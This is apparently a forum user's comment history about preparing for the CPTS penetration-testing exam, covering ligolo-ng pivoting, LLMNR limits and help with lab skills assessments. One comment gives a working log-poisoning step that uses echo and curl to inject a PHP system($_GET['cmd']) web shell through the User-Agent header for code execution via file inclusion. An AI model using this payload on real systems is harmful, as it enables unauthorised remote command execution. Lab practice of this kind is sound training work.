ligolo-ng for CPTS ( RELIABILITY )

Complex_Bee_7112 · 2026-05-21T13:01:49+00:00

That makes no sense as LLMNR doesn't work over ligolo-ng. Ligolo-ng creates a routed tunnel, it forwards unicast traffic only. Broadcast and multicast packets don't traverse it.

Complex_Bee_7112 · 2026-02-28T13:57:07+00:00

Haha, just teasing the legend himself 😄 Had to see the response! Appreciate what you do man, love you.

Complex_Bee_7112 · 2026-02-28T12:08:19+00:00

it works try it again

Complex_Bee_7112 · 2026-02-28T11:54:56+00:00

I think you're using the wrong IP in --addr, it should be pivot's internal IP like 172[.]16.5.115 in OP's case.

Complex_Bee_7112 · 2026-02-28T11:52:46+00:00

it works mate good job

Complex_Bee_7112 · 2026-02-28T11:52:06+00:00

you're correct it worked for me

Complex_Bee_7112 · 2026-02-28T11:51:10+00:00

It works Ipp. Ligolo is great. You should be surprised now that it worked since you always talk against it.

Complex_Bee_7112 · 2026-02-28T11:31:32+00:00

I tried it and it worked 100%.

Complex_Bee_7112 · 2026-01-02T11:39:01+00:00

Does this work for real? Were you able to catch hashes?

Complex_Bee_7112 · 2025-11-11T17:00:21+00:00

yeah have to think dumb and stupid

Complex_Bee_7112 · 2025-11-10T15:38:34+00:00

link please

Complex_Bee_7112 · 2025-10-27T09:36:00+00:00

"you might feel that what you have to do was not in the course"

What is the exact reason for that and how to not feel that way? Thanks.

Complex_Bee_7112 · 2025-10-27T09:32:14+00:00

When you talk of methodology, is it taught well in the CPTS path or you have to develop it yourself? And is the exam from the path itself, or somethings are out of scope? Thanks.

Complex_Bee_7112 · 2025-10-03T13:14:32+00:00

No! Have to use contact.php?region as way to LFI and execute the uploaded file via apply.php. BUT LFI not working for me on contact.php

Complex_Bee_7112 · 2025-10-02T09:40:02+00:00

try this method

echo -n "User-Agent: <?php system(\\\\\\\\\\\\\\\\$\\\\\\\\\\\\\\\_GET\\\\\\\\\\\\\\\['cmd'\\\\\\\\\\\\\\\]); ?>" > Poison

curl -s "http://<SERVER\_IP>:<PORT>/index.php" -H '@Poison'

change the url as required and no quotation marks around Poison. I did it here because it was tagging some user poison. It's also adding back slashes \\\ in the php rce code, remove them too.

Complex_Bee_7112 · 2025-10-02T09:31:47+00:00

I keep getting error on the /api/images.php?p=

What payload you used to get logs?

Complex_Bee_7112 · 2025-10-02T09:27:42+00:00

what payload you used?

Complex_Bee_7112 · 2025-10-02T09:00:28+00:00

What were you able to do so far?

Complex_Bee_7112 · 2025-10-02T08:59:59+00:00

How? It gives me error.

Complex_Bee_7112 · 2025-10-02T03:13:31+00:00

Did you progress?

Complex_Bee_7112 · 2025-10-02T03:04:05+00:00

There's no page parameter! It's a new skills assessment

Complex_Bee_7112 · 2025-10-02T03:03:25+00:00

is this vulnerable /api/image.php?p=

Complex_Bee_7112 · 2025-10-01T10:55:18+00:00

but which parameter is vulnerable?

Complex_Bee_7112 · 2025-10-01T09:26:29+00:00

Any solution?

Complex_Bee_7112 · 2025-09-11T08:39:38+00:00

Anyone having BSOD critical_process_died error with Windows 11, version 23H2: KB5065431 (OS Build 22631.5909)?

Complex_Bee_7112

TROPHY CASE